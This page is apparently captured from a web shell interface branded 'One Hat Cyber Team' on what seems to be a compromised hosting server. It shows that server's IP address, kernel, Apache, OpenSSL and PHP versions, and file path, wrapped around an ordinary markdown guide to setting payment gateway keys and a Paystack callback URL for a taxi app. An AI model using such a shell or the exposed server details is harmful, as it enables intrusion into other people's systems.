⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
taxi.dev-unit.com
/
resources
/
docs
/
1.0
/
View File Name :
payment-gateway-setup.md
# Payment Gateway Installation --- - [Introduction](#section-1) - [Payment Keys Setup](#section-2) <a name="section-1"></a> ## Introduction In this section, we are going to see how we should update our payment gateway keys for the application. <a name="section-2"></a> ## Payment Keys Setup * Since we are using 5 payment gateways, we should update our test & productions keys for server and flutter apps by the below admin app settings. * Go To Admin app Configurations menu & Click System settings & Click Installation settings, you can see the screen like below.  * You can update your test keys and production keys by this settings. <br> <br><br> <strong>Note: For Paystack payment gateway you need to add an additional setup that is you should update call back url in paystack settings</strong> <h3> Paystack setup</h3> * Once you have updated the keys in the admin settings. you should update your callback url in paystack settings section like below. * Call back url example : "http://your-base-url/api/v1/payment/paystack/web-hook". 